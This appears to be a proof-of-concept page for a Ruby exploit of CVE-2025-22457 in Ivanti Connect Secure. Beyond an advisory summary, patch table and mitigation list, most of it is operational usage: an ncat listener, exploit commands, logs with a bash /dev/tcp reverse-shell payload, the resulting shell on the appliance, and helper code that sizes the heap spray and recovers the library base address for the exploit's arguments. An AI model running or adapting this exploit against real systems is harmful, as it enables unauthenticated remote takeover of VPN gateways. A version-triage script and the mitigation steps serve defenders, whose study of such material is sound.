POC details: 91a3ae739e3557c7d17273ee7eb551fd836d14cc

Related vulnerability
Title: Ivanti Connect Secure security vulnerability (CVE-2025-22457)
Description: Ivanti Connect Secure (ICS) is a secure remote network access product from the US company Ivanti. Ivanti Connect Secure contains a security vulnerability caused by a stack-based buffer overflow, which may lead to remote code execution.
CVE-2025-22457
Introduction
# CVE-2025-22457: Critical Ivanti Connect Secure Vulnerability ⚡


### ⚠️ CVE-2025-22457 Overview

🛡️ **Type:** Critical stack-based buffer overflow
💻 **Affected Products:**

* Ivanti Connect Secure (≤ 22.7R2.5)
* Ivanti Policy Secure (≤ 22.7R1.3)
* Ivanti ZTA Gateways (≤ 22.8R2)
* Pulse Connect Secure (≤ 9.1R18.9, EoS)

🔥 **Impact:** Remote unauthenticated code execution

---

### 📅 Patch Release Dates

| 🛠️ Product           | 📦 Fixed Version | 📆 Release Date |
| --------------------- | ---------------- | --------------- |
| Ivanti Connect Secure | 22.7R2.6         | Feb 2025        |
| Ivanti Policy Secure  | 22.7R1.4         | April 21, 2025  |
| Ivanti ZTA Gateways   | 22.8R2.2         | April 19, 2025  |
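
To put the table above to use against a fleet inventory, here is an added example in Ruby (the language of the PoC), not code from this repository or from Ivanti. It parses the marketing version scheme (x.yRz.w) and classifies each appliance as patched, vulnerable, or end-of-support. The inventory entries and hostnames are constructed for illustration.

```ruby
# Added example (not part of the CVE-2025-22457.rb PoC): classify an appliance's
# reported version against the fixed versions in the advisory table.

# Fixed versions from the table; Pulse Connect Secure is end of support and
# receives no fix, so it is listed with its last affected release instead.
FIXED_VERSIONS = {
  'Ivanti Connect Secure' => '22.7R2.6',
  'Ivanti Policy Secure'  => '22.7R1.4',
  'Ivanti ZTA Gateways'   => '22.8R2.2',
}.freeze
END_OF_SUPPORT = { 'Pulse Connect Secure' => '9.1R18.9' }.freeze

# Turn "22.7R2.5" into [22, 7, 2, 5] so Array#<=> orders releases correctly
# ([22, 8, 2] sorts before [22, 8, 2, 2], i.e. 22.8R2 < 22.8R2.2).
# Only the marketing scheme is handled; the build string the appliance reports
# (e.g. 22.7.2.3597) is a different scheme and must not be fed to this function.
def parse_version(version)
  parts = version.scan(/\d+/).map(&:to_i)
  raise ArgumentError, "unparseable version: #{version.inspect}" if parts.empty?
  parts
end

# Returns :patched, :vulnerable or :end_of_support (no fix will ever ship).
def patch_status(product, version)
  v = parse_version(version)
  if (fixed = FIXED_VERSIONS[product])
    (v <=> parse_version(fixed)) >= 0 ? :patched : :vulnerable
  elsif END_OF_SUPPORT.key?(product)
    :end_of_support
  else
    raise ArgumentError, "unknown product: #{product}"
  end
end

# Constructed inventory; each entry is [hostname, product, version].
INVENTORY = [
  ['vpn-1', 'Ivanti Connect Secure', '22.7R2.5'],
  ['vpn-2', 'Ivanti Connect Secure', '22.7R2.6'],
  ['pol-1', 'Ivanti Policy Secure',  '22.7R1.3'],
  ['zta-1', 'Ivanti ZTA Gateways',   '22.8R2'],
  ['old-1', 'Pulse Connect Secure',  '9.1R18.9'],
].freeze

def triage(inventory = INVENTORY)
  inventory.map { |host, product, version| [host, patch_status(product, version)] }
end

if __FILE__ == $PROGRAM_NAME
  triage.each { |host, status| puts format('%-6s %s', host, status) }
end
```

Anything reported as :vulnerable or :end_of_support should be treated as a candidate for the ICT check in the mitigation steps, not just an upgrade, since the bug was exploited before the patches shipped.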

---

### 🚨 Exploitation in the Wild

* 🕵️‍♂️ Active since mid-March 2025
* 🎯 Targeted by espionage groups (suspected China-linked)
* 💀 Uses malware: TRAILBLAZE (dropper), BRUSHFIRE (backdoor), SPAWN malware ecosystem

---

### ✅ Mitigation Steps

1. ⬆️ **Update** affected systems immediately
2. 🔍 **Detect** compromises with Integrity Checker Tool (ICT)
3. 🕵️‍♀️ **Investigate** and isolate suspected systems
4. 🔑 **Reset** certificates, keys, and passwords
5. 📊 **Monitor** logs for unusual activity continuously

---

### 🚨 Usage:

We can run this script against a vulnerable Ivanti Connect Secure target (version 22.7R2.4) as follows:

Start a netcat listener to catch the reverse shell.

```
sudo ncat -lnvkp 8080
```

Run the exploit and brute-force the libdsplibs base address (this will be slow):

```
sudo ruby CVE-2025-22457.rb -t 192.168.86.111 -p 443 --lhost 192.168.86.35 --lport 8080
[2025-04-10 16:21:13 +0100] [+] Targeting https://192.168.86.111:443/
[2025-04-10 16:21:13 +0100] [+] Payload: bash -i >& /dev/tcp/192.168.86.35/8080 0>&1
[2025-04-10 16:21:13 +0100] [+] Detected version 22.7.2.3597
[2025-04-10 16:21:13 +0100] [+] Starting...
[2025-04-10 16:21:13 +0100] [+] Attempt 0, trying libdsplibs.so @ 0xf64ca000
[2025-04-10 16:21:13 +0100]     Making connections...
[2025-04-10 16:21:18 +0100]     Spraying...
[2025-04-10 16:22:27 +0100]     Triggering...
```

When it works you will get a reverse shell.

```
sudo ncat -lnvkp 8080
Ncat: Version 7.93 ( https://nmap.org/ncat )
Ncat: Listening on :::8080
Ncat: Listening on 0.0.0.0:8080
Ncat: Connection from 192.168.86.111.
Ncat: Connection from 192.168.86.111:20746.
bash: cannot set terminal process group (-1): Inappropriate ioctl for device
bash: no job control in this shell
bash-4.2$ id
id
uid=104(nr) gid=104(nr) groups=104(nr)
bash-4.2$ uname -a
uname -a
Linux localhost2 4.17.00.35-selinux-jailing-production #1 SMP Tue Jun 18 16:25:33 UTC 2024 x86_64 x86_64 x86_64 GNU/Linux
bash-4.2$
```

---

## 📡 Debug:

### Web Child Processes:

The number of CPUs available to the target appliance dictates how many child processes the /home/bin/web binary spawns. Incoming HTTPS requests are distributed across these children, and we cannot know which child will handle the request that triggers the vulnerability, so the heap spray must be repeated enough times to be present in every child process.

+ 1 vCPU - 1 web process, no children
+ 2 vCPU - 1 web parent, 2 children
+ 4 vCPU - 1 web parent, 4 children (This is the default, and corresponds to the Ivanti Connect Secure ISA4000-V platform)
+ 8 vCPU - 1 web parent, 8 children (This corresponds to the Ivanti Connect Secure ISA6000-V platform)

For example, on a rooted vulnerable appliance, run the following to see the number of child /home/bin/web processes:

```
bash-4.2# ps -Al | grep web
ps -Al | grep web
4 S   104  3012  2394  0  80   0 - 26313 -      ?        00:00:00 web
4 S   104  3013  2394  0  80   0 - 24931 -      ?        00:00:00 web80
1 S   104  4947  3012  2  80   0 - 28209 -      ?        00:01:27 web
1 S   104  5217  3012  1  80   0 - 31527 -      ?        00:00:49 web
1 S   104  5695  3012  0  80   0 - 28199 -      ?        00:00:00 web
1 S   104  5715  3012  0  80   0 - 28199 -      ?        00:00:00 web
bash-4.2#
```

You can specify the expected number of web children via the --web_children argument, for example:

```
sudo ruby CVE-2025-22457.rb -t 192.168.86.111 -p 443 --lhost 192.168.86.35 --lport 8080 --web_children 4
```
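
Added example, not part of the PoC or this README: a Ruby snippet that derives the --web_children value from ps -Al output of the shape shown above, and then estimates how many spray requests are needed if the kernel hands each accepted connection to an effectively random child rather than strictly round-robin. That random model is an assumption of the example (the README only says requests are distributed evenly); under strict round-robin one spray per child would suffice. The ps sample is constructed from the listing above.

```ruby
# Added example (not part of the CVE-2025-22457.rb PoC): count web children from
# `ps -Al` output and size the heap spray so every child sees at least one copy.

# Constructed `ps -Al` sample, copied in shape from the README listing.
PS_SAMPLE = <<~PS
  4 S   104  3012  2394  0  80   0 - 26313 -      ?        00:00:00 web
  4 S   104  3013  2394  0  80   0 - 24931 -      ?        00:00:00 web80
  1 S   104  4947  3012  2  80   0 - 28209 -      ?        00:01:27 web
  1 S   104  5217  3012  1  80   0 - 31527 -      ?        00:00:49 web
  1 S   104  5695  3012  0  80   0 - 28199 -      ?        00:00:00 web
  1 S   104  5715  3012  0  80   0 - 28199 -      ?        00:00:00 web
PS

# `ps -Al` columns: F S UID PID PPID C PRI NI ADDR SZ WCHAN TTY TIME CMD.
def parse_ps(text)
  text.each_line.filter_map do |line|
    cols = line.split
    next if cols.size < 14 || cols[0] == 'F' # skip short lines and the header
    { pid: cols[3].to_i, ppid: cols[4].to_i, cmd: cols[13] }
  end
end

# Children are processes named exactly "web" whose parent is itself a "web"
# process. web80 shares the parent's PPID (2394) and is a sibling, not a child,
# so the exact name match excludes it.
def web_children(procs)
  parents = procs.select { |p| p[:cmd] == 'web' }.map { |p| p[:pid] }
  procs.count { |p| p[:cmd] == 'web' && parents.include?(p[:ppid]) }
end

def choose(n, k)
  (1..k).reduce(1) { |acc, i| acc * (n - k + i) / i }
end

# Assumption: each request lands on a uniformly random worker. The probability
# that all `workers` receive at least one of `requests` spray requests is the
# coupon-collector probability, computed by inclusion-exclusion.
def coverage_probability(workers, requests)
  (0..workers).sum do |j|
    (-1)**j * choose(workers, j) * ((workers - j).to_f / workers)**requests
  end
end

# Smallest request count that covers every worker with the given confidence.
# With no children (1 vCPU) the parent serves requests itself, so workers = 1.
def spray_requests(children, confidence = 0.99)
  workers = [children, 1].max
  (workers..10_000).find { |t| coverage_probability(workers, t) >= confidence }
end

if __FILE__ == $PROGRAM_NAME
  n = web_children(parse_ps(PS_SAMPLE))
  puts "--web_children #{n}"
  puts "spray requests for 99% coverage under random assignment: #{spray_requests(n)}"
end
```

For the four-child default the random model needs 21 spray requests for 99% confidence, against 4 under strict round-robin; the gap is why under-counting children on a target makes the exploit intermittently fail rather than reliably fail.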

### libdsplibs Base Address

If you are testing the PoC on a local system, you may want to avoid brute-forcing the libdsplibs base address. In this scenario, you can pass a known base address to the PoC via the --libdsplibs argument. For example, on a rooted vulnerable appliance, run the following:

```
bash-4.2# ps -A| grep web
ps -A| grep web
 3200 ?        00:00:01 web80
20536 ?        00:00:02 web
bash-4.2# cat /proc/20536/maps | grep libdsplibs
cat /proc/20536/maps | grep libdsplibs
f642e000-f7994000 r-xp 00000000 fc:02 171879                             /home/lib/libdsplibs.so
f7994000-f7995000 ---p 01566000 fc:02 171879                             /home/lib/libdsplibs.so
f7995000-f79aa000 r--p 01566000 fc:02 171879                             /home/lib/libdsplibs.so
f79aa000-f79e3000 rw-p 0157b000 fc:02 171879                             /home/lib/libdsplibs.so
bash-4.2#
```

Then you can pass the known base address to the PoC as follows:

```
sudo ruby CVE-2025-22457.rb -t 192.168.86.111 -p 443 --lhost 192.168.86.35 --lport 8080 --web_children 4 --libdsplibs 0xf642e000
[2025-04-10 16:21:13 +0100] [+] Targeting https://192.168.86.111:443/
[2025-04-10 16:21:13 +0100] [+] Payload: bash -i >& /dev/tcp/192.168.86.35/8080 0>&1
[2025-04-10 16:21:13 +0100] [+] Detected version 22.7.2.3597
[2025-04-10 16:21:13 +0100] [+] Starting...
[2025-04-10 16:21:13 +0100] [+] Attempt 0, trying libdsplibs.so @ 0xf642e000
[2025-04-10 16:21:13 +0100]     Making connections...
[2025-04-10 16:21:18 +0100]     Spraying...
[2025-04-10 16:22:27 +0100]     Triggering...
```
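
Added example, not part of the PoC: a Ruby parser for /proc/<pid>/maps that recovers the library base address the procedure above reads by hand and formats it as the --libdsplibs argument. The maps sample is constructed from the listing above with one anonymous mapping appended to exercise path-less lines; library_base_from_pid only makes sense on the rooted appliance and is not exercised offline.

```ruby
# Added example (not part of the CVE-2025-22457.rb PoC): recover a shared
# library's load address from /proc/<pid>/maps.

# Constructed from the README's maps output; the last line is an added
# anonymous mapping with no path.
MAPS_SAMPLE = <<~MAPS
  f642e000-f7994000 r-xp 00000000 fc:02 171879                             /home/lib/libdsplibs.so
  f7994000-f7995000 ---p 01566000 fc:02 171879                             /home/lib/libdsplibs.so
  f7995000-f79aa000 r--p 01566000 fc:02 171879                             /home/lib/libdsplibs.so
  f79aa000-f79e3000 rw-p 0157b000 fc:02 171879                             /home/lib/libdsplibs.so
  f79e3000-f79e6000 rw-p 00000000 00:00 0
MAPS

Mapping = Struct.new(:start, :finish, :perms, :offset, :path)

# start-end perms offset dev inode [path]
MAPS_LINE = /\A(\h+)-(\h+)\s+(\S{4})\s+(\h+)\s+\S+\s+\d+\s*(.*)\z/

def parse_maps(text)
  text.each_line.filter_map do |line|
    m = MAPS_LINE.match(line.chomp) or next
    Mapping.new(m[1].hex, m[2].hex, m[3], m[4].hex, m[5].strip)
  end
end

# Mappings belonging to a library, matched by basename so either
# "libdsplibs.so" or "/home/lib/libdsplibs.so" works as the name.
def library_mappings(maps, name)
  maps.select { |m| !m.path.empty? && File.basename(m.path) == File.basename(name) }
end

# The base is the start of the library's lowest mapping. For a normal ELF
# shared object that is the executable segment at file offset 0, so both
# properties are checked before the value is trusted.
def library_base(maps, name)
  segs = library_mappings(maps, name)
  raise ArgumentError, "#{name} is not mapped" if segs.empty?
  first = segs.min_by(&:start)
  unless first.offset.zero? && first.perms.include?('x')
    raise "unexpected lowest mapping for #{name}: #{first.perms} at offset #{first.offset}"
  end
  first.start
end

# On the rooted appliance: read the live map of a web child by PID.
def library_base_from_pid(pid, name = 'libdsplibs.so')
  library_base(parse_maps(File.read("/proc/#{pid}/maps")), name)
end

def base_argument(maps, name = 'libdsplibs.so')
  format('--libdsplibs 0x%08x', library_base(maps, name))
end

if __FILE__ == $PROGRAM_NAME
  puts base_argument(parse_maps(MAPS_SAMPLE))
end
```

Because every web child is forked from the same parent, the base read from any one child's map applies to all of them, which is what makes a single --libdsplibs value sufficient for the whole spray.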

---


### ⚠️ Disclaimer:

The information provided here is for educational and awareness purposes only. Always follow your organization’s security policies and procedures when applying patches or performing security assessments. Unauthorized exploitation or scanning of systems without permission is illegal and unethical. Stay responsible and secure! 🛡️🔒

File snapshot

```
[4.0K] /data/pocs/91a3ae739e3557c7d17273ee7eb551fd836d14cc
├── [9.9K] CVE-2025-22457.rb
└── [6.2K] README.md

0 directories, 2 files
```